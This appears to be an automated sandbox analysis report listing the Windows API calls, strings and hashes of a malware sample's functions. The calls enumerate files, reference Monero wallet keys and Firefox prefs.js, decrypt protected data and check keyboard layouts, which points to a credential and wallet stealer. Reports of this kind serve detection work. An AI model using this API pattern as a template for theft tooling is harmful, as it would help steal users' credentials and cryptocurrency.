                              • Opcode Fuzzy Hash: 4b700a1b8b46c7096537457b079891bac20fb44399735ba83e6f57120f5acb8f
                              • Instruction Fuzzy Hash: A95113B2900218ABCB24EBB0DC85FEE737CBBD4304F404588B65D96151EF75AB898F91
                              APIs
                              • wsprintfA.USER32 ref: 0093ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0093ED55
                              • StrCmpCA.SHLWAPI(?,00951538), ref: 0093EDAB
                              • StrCmpCA.SHLWAPI(?,0095153C), ref: 0093EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0093F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: e7282283d754456a9303167ddb3785f4bd1b46c48f85ee05c79ea0c817ad8ac1
                              • Instruction ID: c1bc3b5fd5c4d88c95ce331c0a0ddd6713bcac0c0c49da5cba9c7e3adda84f7a
                              • Opcode Fuzzy Hash: e7282283d754456a9303167ddb3785f4bd1b46c48f85ee05c79ea0c817ad8ac1
                              • Instruction Fuzzy Hash: 59E1CF72951118AAEB54FB60DC52FEE7338EFD4304F404599B50A62192EF306F8ACF56
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009515B8,00950D96), ref: 0093F71E
                              • StrCmpCA.SHLWAPI(?,009515BC), ref: 0093F76F
                              • StrCmpCA.SHLWAPI(?,009515C0), ref: 0093F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0093FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 6f1a3ec6a4a384a5c7e4a96146e287a3789cfc306f870819ba4339e4022723d2
                              • Instruction ID: 06262b907ada2e9d7e2a68509d8d0cc80a6ae24f786b7349520b994568c3e59f
                              • Opcode Fuzzy Hash: 6f1a3ec6a4a384a5c7e4a96146e287a3789cfc306f870819ba4339e4022723d2
                              • Instruction Fuzzy Hash: BDB1F0719502189BDB24EF64DC96FEE7379AFD4304F4085A8A40A97291EF306B49CF92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: o/$#{$)i~;$*e|>$A9$G{$jrw$p2{n$s`|${Gc$-a
                              • API String ID: 0-2774155213
                              • Opcode ID: dc50b4834ec0bf768bd7da747fcb484fb610efb839227251197f2d48f3a79054
                              • Instruction ID: 3d4c2d43399a9ff8a4e30ab7f603f8a4218084eecaf6c4a6d10292db86cf5ad5
                              • Opcode Fuzzy Hash: dc50b4834ec0bf768bd7da747fcb484fb610efb839227251197f2d48f3a79054
                              • Instruction Fuzzy Hash: 80B229F3A082009FE7046E2DEC8567AFBE9EFD4720F1A463DEAC4C3744E53598058696
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0095510C,?,?,?,009551B4,?,?,00000000,?,00000000), ref: 00931923
                              • StrCmpCA.SHLWAPI(?,0095525C), ref: 00931973
                              • StrCmpCA.SHLWAPI(?,00955304), ref: 00931989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00931D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00931DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00931E20
                              • FindClose.KERNEL32(000000FF), ref: 00931E32
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 16a05224194079d20c8484bd30d03077433b46d115262a200d275c2904cdfa78
                              • Instruction ID: 8f49c196bfd66fb8b2588734b0d06a5cf148757edef77a5be472efd8fcea1087
                              • Opcode Fuzzy Hash: 16a05224194079d20c8484bd30d03077433b46d115262a200d275c2904cdfa78
                              • Instruction Fuzzy Hash: 61122071950118ABEB29FB60CC96FEE7378EF94304F414599B50A62191EF306F89CFA1
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00950C2E), ref: 0093DE5E
                              • StrCmpCA.SHLWAPI(?,009514C8), ref: 0093DEAE
                              • StrCmpCA.SHLWAPI(?,009514CC), ref: 0093DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0093E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 6a2c5d8af793bf5bda2ce18cf50638519f55a06908f9d87b57350c2ee6299864
                              • Instruction ID: 9575d49eea3461f11a1de5316233e31917534f3dea1efdad2fedb669aef7fb54
                              • Opcode Fuzzy Hash: 6a2c5d8af793bf5bda2ce18cf50638519f55a06908f9d87b57350c2ee6299864
                              • Instruction Fuzzy Hash: B6F19D719541189AEB29EB60DC95FEE7338FF94304F8141D9B40A62191EF306F8ACF66
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009514B0,00950C2A), ref: 0093DAEB
                              • StrCmpCA.SHLWAPI(?,009514B4), ref: 0093DB33
                              • StrCmpCA.SHLWAPI(?,009514B8), ref: 0093DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0093DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 2ba05d426389289720a977b181fadf476821f966282bb70babdefdbe6fbbd6bc
                              • Instruction ID: c010cc819bab9768bb3179c51ec93cdcb64036219b001587016220d244e3409d
                              • Opcode Fuzzy Hash: 2ba05d426389289720a977b181fadf476821f966282bb70babdefdbe6fbbd6bc
                              • Instruction Fuzzy Hash: 23912072900104ABDB14FBB0EC96EED737DABC4304F408668F91A96191EE349B59CF92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: 'bz'$)\}$9!_#$C(f^$Gdoy$O7/$Pi?|$R]?k$d/N6
                              • API String ID: 0-2577963867
                              • Opcode ID: f4cfc7e43c852c48885497c987356b930fbf63d81f482fc13ac31c830ee97bb9
                              • Instruction ID: cdc8d865c2bd8b627c535adbaa671a299316e9c54f8068a1dd87843fd9c9cae3
                              • Opcode Fuzzy Hash: f4cfc7e43c852c48885497c987356b930fbf63d81f482fc13ac31c830ee97bb9
                              • Instruction Fuzzy Hash: EBC22AF36082049FE304AE2DEC8567AFBE9EFD4720F1A453DE6C5C7744EA3598058692
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,009505AF), ref: 00947BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00947BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00947C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00947C62
                              • LocalFree.KERNEL32(00000000), ref: 00947D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 8be94cc05d86d1489b8844bfdbd07df7a9c42b7ef37910303d1a56e07abee4ce
                              • Instruction ID: 46afba87aae3706da6a523100a0507fbf639b7dd654981416b19dd0dad0f1259
                              • Opcode Fuzzy Hash: 8be94cc05d86d1489b8844bfdbd07df7a9c42b7ef37910303d1a56e07abee4ce
                              • Instruction Fuzzy Hash: F041397194021CABDB24DB94DC99FEEB3B8FF84705F204199E50A62291DB342F85CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: $%r$*f=?$6ko}$>&?$@%~~$[Mn*$y+VQ
                              • API String ID: 0-3763056965
                              • Opcode ID: bf614f563e77f6e51c8bcf124ed347bfda5abaa5a6002ab33853656f698c94d2
                              • Instruction ID: fb28fee13f6cb8c4b8b2dc35779634a31784df4db464badaa94cd9b3c7986555
                              • Opcode Fuzzy Hash: bf614f563e77f6e51c8bcf124ed347bfda5abaa5a6002ab33853656f698c94d2
                              • Instruction Fuzzy Hash: 79722AF3A08204AFE3046E2DEC8567ABBE9EFD4720F1A453DE6C5C3744E63599058692
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00950D73), ref: 0093E4A2
                              • StrCmpCA.SHLWAPI(?,009514F8), ref: 0093E4F2
                              • StrCmpCA.SHLWAPI(?,009514FC), ref: 0093E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c351e0ab33e69bd2e1741680c34592232747621a59accc69d4d7b4591a3cace2
                              • Instruction ID: c9dfda24b818054dd9d34a4e867cba153c74cb6da39ee6a1190b7db1bc026e3c
                              • Opcode Fuzzy Hash: c351e0ab33e69bd2e1741680c34592232747621a59accc69d4d7b4591a3cace2
                              • Instruction Fuzzy Hash: 21124172950118AAEB28FB60DC96FED7338AFD4304F4045A8B50A96191EF306F49CF92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: :+s$BI^o$C"oI$KfnU$z[<$o/
                              • API String ID: 0-3130629219
                              • Opcode ID: 18b0c339f2ab16393856cec457af47c95074d2ec0a43e06c24590ae98ee5ce35
                              • Instruction ID: 312832fe18591bad1ee687b95f9df12bff0f2dc271667428a3067853eeb2719e
                              • Opcode Fuzzy Hash: 18b0c339f2ab16393856cec457af47c95074d2ec0a43e06c24590ae98ee5ce35
                              • Instruction Fuzzy Hash: 9DB207F360C204AFD3046E2DEC8567ABBE9EFD4720F1A863DE6C4C7744E63598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ,i4#$1o$BRl[$Oe|$hyM$oBYf
                              • API String ID: 0-1248956356
                              • Opcode ID: 24bb54afb3f278359ffa0f88d7ebad85b8992522b653dc71bef0180bff02acc4
                              • Instruction ID: 5c1f4e830096a07265a303f3f943ca5bd12ae7eaf4801bcbb3d099d6460b3acd
                              • Opcode Fuzzy Hash: 24bb54afb3f278359ffa0f88d7ebad85b8992522b653dc71bef0180bff02acc4
                              • Instruction Fuzzy Hash: 8EB207F3508204AFE304AE2DEC8567ABBE5EF94720F1A493DEAC4C7744E63598058797
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0093C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C
                              • lstrcat.KERNEL32(?,00950B46), ref: 0093C943
                              • lstrcat.KERNEL32(?,00950B47), ref: 0093C957
                              • lstrcat.KERNEL32(?,00950B4E), ref: 0093C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 2f0915dccc4ae97274cda47d4d7a19b553081f62ad46ef0c7e36bd645aa433e8
                              • Instruction ID: 1e1af2bb7ca56eb5f300981ef35d5520570fc5ed84d3b86205f4766f4bfdeaa5
                              • Opcode Fuzzy Hash: 2f0915dccc4ae97274cda47d4d7a19b553081f62ad46ef0c7e36bd645aa433e8
                              • Instruction Fuzzy Hash: CA4160B590421ADFCB10DFA0DD89BEEB7B8BB84704F1045A8E509A7280DB745A84CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0093724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00937254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00937281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009372A4
                              • LocalFree.KERNEL32(?), ref: 009372AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 674253222fae27aeebb204c2772d1456dd32b8c132222fe058e3f97564b37465
                              • Instruction ID: 33147c00fbd003904ae1fd2f77b7a965b7fa9ef7bdca0c2a0fcf3959758a5f08
                              • Opcode Fuzzy Hash: 674253222fae27aeebb204c2772d1456dd32b8c132222fe058e3f97564b37465
                              • Instruction Fuzzy Hash: 820112B5A40308BBDB54DFD4CD46F9E77B8EB44701F104554FB09BB2C0DA70AA408B66
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0094961E
                              • Process32First.KERNEL32(00950ACA,00000128), ref: 00949632
                              • Process32Next.KERNEL32(00950ACA,00000128), ref: 00949647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0094965C
                              • CloseHandle.KERNEL32(00950ACA), ref: 0094967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: e511aa49c065c0ab051ec415a15c063fd464afa51a233f0cf517a4597e3770d7
                              • Instruction ID: 47fd28335aa0f9c1f7755e50bb5227cc65701d1043fd2d67c10ea58bc0c9e2b8
                              • Opcode Fuzzy Hash: e511aa49c065c0ab051ec415a15c063fd464afa51a233f0cf517a4597e3770d7
                              • Instruction Fuzzy Hash: EE011E75A00208EBCB54DFA5CD58FEEB7F8EB48301F104188A909A7240DB349F80CF51
